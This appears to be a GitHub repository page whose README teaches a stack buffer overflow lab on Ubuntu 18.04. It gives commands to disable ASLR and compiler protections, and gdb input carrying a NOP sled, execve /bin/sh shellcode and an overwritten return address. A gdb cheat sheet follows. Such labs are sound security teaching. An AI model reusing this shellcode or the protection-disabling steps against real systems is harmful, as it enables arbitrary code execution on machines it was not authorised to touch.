https://github.com/syedsaadahmed/buffer-overflow-vulnerability
Testing the buffer overflow vulnerability in a test environment
https://github.com/syedsaadahmed/buffer-overflow-vulnerability
bash buffer-overflow buffer-overflow-attack linux-shell ubuntu
Last synced: about 12 hours ago
JSON representation
Testing the buffer overflow vulnerability in a test environment
- Host: GitHub
- URL: https://github.com/syedsaadahmed/buffer-overflow-vulnerability
- Owner: syedsaadahmed
- Created: 2022-01-30T19:11:05.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-01-30T19:54:15.000Z (over 3 years ago)
- Last Synced: 2025-02-22T13:57:15.687Z (4 months ago)
- Topics: bash, buffer-overflow, buffer-overflow-attack, linux-shell, ubuntu
- Language: C
- Homepage:
- Size: 11.7 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Buffer-Overflow-Vulnerability
Testing the buffer overflow vulnerability in a test environment
# A Brief Introduction
This is a tutorial developed using a C program just to test the buffer overflow vulnerability and test it on a Ubuntu 18:04 server.
# Pre-requisites
```
ubuntu 18:04 server
gcc (C compiler installed)
gdb (C compiler debugger in order to see compile code and memory address organiation
```
## Disable memory randomization, enable core dumps
```
cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c
# verify "unlimited"
```
# Steps to Execute
First of all clone this git repository inside the Ubuntu server you are using;
```
git clone https://github.com/syedsaadahmed/Buffer-Overflow-Vulnerability.git
```
Secondly we have to compile the C langugae code;
```
gcc -fno-stack-protector -z execstack -no-pie vuln.c -o vuln
```
Segmentation Fault by inserting 550 characters
```
run $(python -c 'print "a" * 550')
```
Creation of patterns for memory addresses
```
pattern_create 550 pat
run $(cat pat)
```
Inserting NOP-Sled and overwriting the rsp/esp buffer;
```
r $(python -c 'print "\x90"*450 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+ "\x41"*43 + "b"*6')
```
Checking the memory addresses to verfiy the overwriting inside buffer
```
x/200x $rsp
```
Execution of the sample shell code in place of memory return address;
```
r $(python -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"\x80\xe6\xff\xff\xff\x7f"')
```
# GDB CheatSheet
This is just a set of command to help us in order to use different commands inside the GDB debugging mode
```
# quit the debugger
quit
# clear the screen
ctrl + l
shell clear
# show debugging symbols, ie. code
list
list main
# show the assemlby code
disas main
# examine information
info os
info functions
info variables
# run the program, with input
run Hello
# examine memory address
x/200x ($esp - 550)
# confirm overwrite of ebp register
info registers
# find a location, below ESP (stack pointer)
EDI = destination index, string / array copying
ESI = source index, string + array copying
EIP = index pointer, next address to execute
EBP = stack base pointer
ESP = stack pointer, starting in high memory, going down
EDX = data register
```